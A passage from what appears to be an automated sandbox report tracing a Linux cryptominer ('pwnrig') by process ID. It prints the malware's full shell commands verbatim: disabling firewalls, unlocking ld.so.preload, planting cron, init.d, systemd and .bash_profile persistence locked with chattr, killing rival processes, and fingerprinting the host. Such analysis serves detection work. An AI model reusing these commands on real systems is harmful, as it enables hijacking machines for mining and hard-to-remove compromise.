/sbin/ip6tablesip6tables -F ufw6-logging-allow4⤵PID:1487
-
-
/sbin/ip6tablesip6tables -F ufw6-not-local4⤵PID:1488
-
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-input4⤵PID:1489
-
-
/sbin/ip6tablesip6tables -F ufw6-user-limit-accept4⤵PID:1490
-
-
/sbin/ip6tablesip6tables -F ufw6-user-limit4⤵PID:1491
-
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-input4⤵PID:1492
-
-
/sbin/ip6tablesip6tables -F ufw6-reject-input4⤵PID:1493
-
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-input4⤵PID:1494
-
-
/sbin/ip6tablesip6tables -F ufw6-after-input4⤵PID:1495
-
-
/sbin/ip6tablesip6tables -F ufw6-user-input4⤵PID:1496
-
-
/sbin/ip6tablesip6tables -F ufw6-before-input4⤵PID:1497
-
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-input4⤵PID:1498
-
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-forward4⤵PID:1499
-
-
/sbin/ip6tablesip6tables -F ufw6-reject-forward4⤵PID:1500
-
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-forward4⤵PID:1501
-
-
/sbin/ip6tablesip6tables -F ufw6-after-forward4⤵PID:1502
-
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-forward4⤵PID:1503
-
-
/sbin/ip6tablesip6tables -F ufw6-user-forward4⤵PID:1504
-
-
/sbin/ip6tablesip6tables -F ufw6-before-forward4⤵PID:1505
-
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-forward4⤵PID:1506
-
-
/sbin/ip6tablesip6tables -F ufw6-track-forward4⤵PID:1507
-
-
/sbin/ip6tablesip6tables -F ufw6-track-output4⤵PID:1508
-
-
/sbin/ip6tablesip6tables -F ufw6-track-input4⤵PID:1509
-
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-output4⤵PID:1510
-
-
/sbin/ip6tablesip6tables -F ufw6-reject-output4⤵PID:1511
-
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-output4⤵PID:1512
-
-
/sbin/ip6tablesip6tables -F ufw6-after-output4⤵PID:1513
-
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-output4⤵PID:1514
-
-
/sbin/ip6tablesip6tables -F ufw6-user-output4⤵PID:1515
-
-
/sbin/ip6tablesip6tables -F ufw6-before-output4⤵PID:1516
-
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-output4⤵PID:1517
-
-
/sbin/ip6tablesip6tables -Z ufw6-logging-deny4⤵PID:1518
-
-
/sbin/ip6tablesip6tables -Z ufw6-logging-allow4⤵PID:1519
-
-
/sbin/ip6tablesip6tables -Z ufw6-not-local4⤵PID:1520
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-input4⤵PID:1521
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-limit-accept4⤵PID:1522
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-limit4⤵PID:1523
-
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-input4⤵PID:1524
-
-
/sbin/ip6tablesip6tables -Z ufw6-reject-input4⤵PID:1526
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-input4⤵PID:1529
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-input4⤵PID:1530
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-input4⤵PID:1531
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-input4⤵PID:1532
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-input4⤵PID:1533
-
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-forward4⤵PID:1534
-
-
/sbin/ip6tablesip6tables -Z ufw6-reject-forward4⤵PID:1535
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-forward4⤵PID:1541
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-forward4⤵PID:1542
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-forward4⤵PID:1543
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-forward4⤵PID:1544
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-forward4⤵PID:1545
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-forward4⤵PID:1548
-
-
/sbin/ip6tablesip6tables -Z ufw6-track-forward4⤵PID:1549
-
-
/sbin/ip6tablesip6tables -Z ufw6-track-output4⤵PID:1550
-
-
/sbin/ip6tablesip6tables -Z ufw6-track-input4⤵PID:1551
-
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-output4⤵PID:1552
-
-
/sbin/ip6tablesip6tables -Z ufw6-reject-output4⤵PID:1553
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-output4⤵PID:1555
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-output4⤵PID:1556
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-output4⤵PID:1557
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-output4⤵PID:1559
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-output4⤵PID:1560
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-output4⤵PID:1563
-
-
/sbin/ip6tablesip6tables -X ufw6-logging-deny4⤵PID:1564
-
-
/sbin/ip6tablesip6tables -X ufw6-logging-allow4⤵PID:1565
-
-
/sbin/ip6tablesip6tables -X ufw6-not-local4⤵PID:1566
-
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-input4⤵PID:1567
-
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-output4⤵PID:1569
-
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-forward4⤵PID:1570
-
-
/sbin/ip6tablesip6tables -X ufw6-user-limit-accept4⤵PID:1571
-
-
/sbin/ip6tablesip6tables -X ufw6-user-limit4⤵PID:1572
-
-
/sbin/ip6tablesip6tables -X ufw6-user-input4⤵PID:1574
-
-
/sbin/ip6tablesip6tables -X ufw6-user-forward4⤵PID:1575
-
-
/sbin/ip6tablesip6tables -X ufw6-user-output4⤵PID:1578
-
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-input4⤵PID:1579
-
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-output4⤵PID:1580
-
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-forward4⤵PID:1581
-
-
/sbin/ip6tablesip6tables -P INPUT ACCEPT4⤵PID:1582
-
-
/sbin/ip6tablesip6tables -P OUTPUT ACCEPT4⤵PID:1584
-
-
/sbin/ip6tablesip6tables -P FORWARD ACCEPT4⤵PID:1586
-
-
-
-
/usr/bin/bashbash -c "iptables -P INPUT ACCEPT"2⤵
- System Network Configuration Discovery
PID:1592
-
-
/usr/sbin/iptablesiptables -P INPUT ACCEPT2⤵PID:1592
-
-
/usr/bin/bashbash -c "iptables -P OUTPUT ACCEPT"2⤵
- System Network Configuration Discovery
PID:1593
-
-
/usr/sbin/iptablesiptables -P OUTPUT ACCEPT2⤵PID:1593
-
-
/usr/bin/bashbash -c "iptables -P FORWARD ACCEPT"2⤵
- System Network Configuration Discovery
PID:1596
-
-
/usr/sbin/iptablesiptables -P FORWARD ACCEPT2⤵PID:1596
-
-
/usr/bin/bashbash -c "iptables -F"2⤵
- System Network Configuration Discovery
PID:1597
-
-
/usr/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
PID:1597
-
-
/usr/bin/bashbash -c "chattr -ia /etc/ld.so.preload"2⤵PID:1599
-
-
/usr/bin/chattrchattr -ia /etc/ld.so.preload2⤵
- Attempts to change immutable files
PID:1599
-
-
/usr/bin/pgreppgrep -f klibsystem42⤵PID:1611
-
-
/usr/bin/pgreppgrep -f klibsystem52⤵
- Reads CPU attributes
- Reads runtime system information
PID:1612
-
-
/usr/bin/chattrchattr +ia /etc/init.d/knlib2⤵
- Attempts to change immutable files
PID:1613
-
-
/etc/init.d/knlib/etc/init.d/knlib start2⤵
- Executes dropped EXE
PID:1614 -
/usr/bin/cpcp -f -r -- /bin/knlib5 /bin/klibsystem53⤵PID:1615
-
-
/usr/bin/rmrm -rf -- klibsystem53⤵PID:1617
-
-
-
/usr/bin/chattrchattr +ia /etc/systemd/system/knlibe.service2⤵PID:1618
-
-
/usr/bin/systemctlsystemctl daemon-reload2⤵PID:1619
-
-
/usr/bin/systemctlsystemctl enable knlibe.service2⤵
- Reads EFI boot settings
PID:1652
-
-
/usr/bin/chattrchattr +ia /bin/knlib52⤵PID:1686
-
-
/usr/bin/crontabcrontab -r2⤵PID:1687
-
-
/usr/bin/pkillpkill -f .klibsystem52⤵
- Reads CPU attributes
- Reads runtime system information
PID:1688
-
-
/usr/bin/pkillpkill -f .klibsystem42⤵
- Reads runtime system information
PID:1689
-
-
/usr/bin/bashbash -c "echo \"* * * * * /var/tmp/.klibsystem5 >/dev/null 2>&1\" | crontab -"2⤵PID:1690
-
/usr/bin/crontabcrontab -3⤵PID:1692
-
-
-
/usr/bin/chattrchattr +ia /etc/cron.d/.lib-knlib42⤵PID:1693
-
-
/usr/bin/chattrchattr +ia /var/spool/cron/.lib-knlib42⤵PID:1694
-
-
/usr/bin/chattrchattr +ia /etc/cron.hourly/.lib-knlib42⤵PID:1695
-
-
/usr/bin/chattrchattr +ia /etc/cron.daily/.lib-knlib42⤵PID:1696
-
-
/usr/bin/chattrchattr +ia /etc/cron.weekly/.lib-knlib42⤵PID:1697
-
-
/usr/bin/chattrchattr +ia /etc/cron.monthly/.lib-knlib42⤵PID:1698
-
-
/usr/bin/chattrchattr -ia /etc/anacrontab2⤵PID:1699
-
-
/usr/bin/chattrchattr +ia /etc/anacrontab2⤵PID:1700
-
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:1701 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵PID:1702
-
/usr/bin/hostnamehostname -I4⤵PID:1705
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:1707
-
-
/usr/bin/awkawk "{print \"-\"\$2}"4⤵PID:1712
-
-
/usr/bin/headhead -n 14⤵PID:1711
-
-
/usr/bin/grepgrep "Port "4⤵PID:1710
-
-
/usr/bin/catcat /etc/ssh/sshd_config4⤵PID:1709
-
-
/usr/bin/whoamiwhoami4⤵PID:1713
-
-
/usr/bin/hostnamehostname4⤵PID:1714
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
PID:1715
-
-
/usr/bin/sedsed -e "s/\$//"4⤵PID:1721
-
-
/usr/bin/sedsed -e "s/^ *//"4⤵PID:1720
-
-
/usr/bin/cutcut -d: -f24⤵PID:1719
-
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo4⤵
- Checks CPU configuration
PID:1718
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:1724
-
-
/usr/bin/awkawk "{print \$4}"4⤵PID:1727
-
-
/usr/bin/awkawk "{print \$4}"4⤵PID:1730
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:1731
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵PID:1733
-
-
/usr/bin/psps -A "-ostat,ppid"4⤵
- Reads runtime system information
PID:1732
-
-
/usr/bin/idid -u4⤵PID:1735
-
-
/usr/bin/grepgrep -v grep4⤵PID:1738
-
-
/usr/bin/grepgrep /etc/cron4⤵PID:1737
-
-
/usr/bin/psps x4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1736
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"3⤵
- File and Directory Permissions Modification
- Writes file to tmp directory
PID:1740 -
/usr/bin/idid -u4⤵PID:1741
-
-
/usr/bin/idid -u4⤵PID:1742
-
-
/usr/bin/chattrchattr -i -a /bin/bprofr "~/.bash_profile"4⤵PID:1743
-
-
/usr/bin/rmrm -rf /bin/bprofr4⤵PID:1744
-
-
/usr/bin/sedsed -i /bprofr/d "~/.bash_profile"4⤵PID:1745
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/bprofr4⤵
- Writes file to system bin folder
PID:1746
-
-
/usr/bin/idid -u4⤵PID:1747
-
-
/usr/bin/chattrchattr +i +a /bin/bprofr "~/.bash_profile"4⤵PID:1748
-
-
/usr/bin/mkdirmkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly4⤵PID:1749
-
-
/usr/bin/chattrchattr -i -a "/etc/cron.*/pwnrig" /bin/crondr4⤵PID:1750
-
-
/usr/bin/rmrm -rf /bin/crondr4⤵PID:1751
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/crondr4⤵
- Writes file to system bin folder
PID:1752
-
-
/usr/bin/teetee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Creates/modifies Cron job
PID:1754
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Creates/modifies Cron job
PID:1755
-
-
/usr/bin/chmodchmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵
- File and Directory Permissions Modification
PID:1756
-
-
/usr/bin/chattrchattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵
- Attempts to change immutable files
PID:1757
-
-
/usr/bin/whichwhich chkconfig4⤵PID:1758
-
-
/usr/bin/whichwhich update-rc.d4⤵PID:1759
-
-
/usr/bin/chattrchattr -i -a /etc/init.d/pwnrig /bin/initdr4⤵
- Attempts to change immutable files
PID:1760
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig disable4⤵
- Flushes firewall rules
PID:1761
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig remove4⤵PID:1762
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:1763
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:1763
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:1763
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:1763
-
-
-
/usr/bin/rmrm -rf /bin/initdr4⤵PID:1790
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/initdr4⤵
- Writes file to system bin folder
PID:1791
-
-
/usr/bin/teetee /etc/init.d/pwnrig4⤵
- Modifies init.d
PID:1793
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/init.d/pwnrig4⤵
- Modifies init.d
PID:1794
-
-
/usr/bin/chmodchmod +x /etc/init.d/pwnrig /bin/initdr4⤵
- File and Directory Permissions Modification
PID:1795
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig defaults4⤵PID:1796
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:1797
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:1797
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:1797
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:1797
-
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig enable4⤵PID:1823
-
/usr/local/sbin/systemctlsystemctl --quiet enable pwnrig5⤵PID:1824
-
-
/usr/local/bin/systemctlsystemctl --quiet enable pwnrig5⤵PID:1824
-
-
/usr/sbin/systemctlsystemctl --quiet enable pwnrig5⤵PID:1824
-
-
/usr/bin/systemctlsystemctl --quiet enable pwnrig5⤵
- Reads EFI boot settings
PID:1824
-
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:1825
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:1825
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:1825
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
- Reads EFI boot settings
PID:1825
-
-
-
/usr/bin/chattrchattr +i +a /etc/init.d/pwnrig /bin/initdr4⤵PID:1851
-
-
/usr/bin/whichwhich systemctl4⤵PID:1852
-
-
/usr/bin/chattrchattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵PID:1853
-
-
/usr/bin/rmrm -rf /bin/sysdr4⤵PID:1854
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/sysdr4⤵
- Writes file to system bin folder
PID:1855
-
-
/usr/bin/teetee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵
- Modifies systemd
PID:1857
-
-
/usr/bin/sedsed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵PID:1858
-
-
/usr/bin/chattrchattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵PID:1859
-
-
/usr/bin/systemctlsystemctl enable pwnrige.service4⤵PID:1860
-
-
/usr/bin/systemctlsystemctl enable pwnrigl.service4⤵
- Reads EFI boot settings
PID:1886
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵PID:1912
-
-
/usr/bin/systemctlsystemctl reload-or-restart pwnrige.service4⤵
- Reads EFI boot settings
PID:1938
-
-
-
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:2001 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵PID:2025
-
/usr/bin/hostnamehostname -I4⤵PID:2028
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:2030
-
-
/usr/bin/awkawk "{print \"-\"\$2}"4⤵PID:2035
-
-
/usr/bin/headhead -n 14⤵PID:2034
-
-
/usr/bin/grepgrep "Port "4⤵PID:2033
-
-
/usr/bin/catcat /etc/ssh/sshd_config4⤵PID:2032
-
-
/usr/bin/whoamiwhoami4⤵PID:2036
-
-
/usr/bin/hostnamehostname4⤵PID:2037
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
PID:2038
-
-
/usr/bin/sedsed -e "s/\$//"4⤵PID:2044
-
-
/usr/bin/sedsed -e "s/^ *//"4⤵PID:2043
-
-
/usr/bin/cutcut -d: -f24⤵PID:2042
-
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo4⤵
- Checks CPU configuration
PID:2041
-
-
/usr/bin/awkawk "{print \$1}"4⤵
- Reads runtime system information
PID:2047
-
-
/usr/bin/awkawk "{print \$4}"4⤵PID:2050
-
-
/usr/bin/awkawk "{print \$4}"4⤵PID:2053
-
-
-
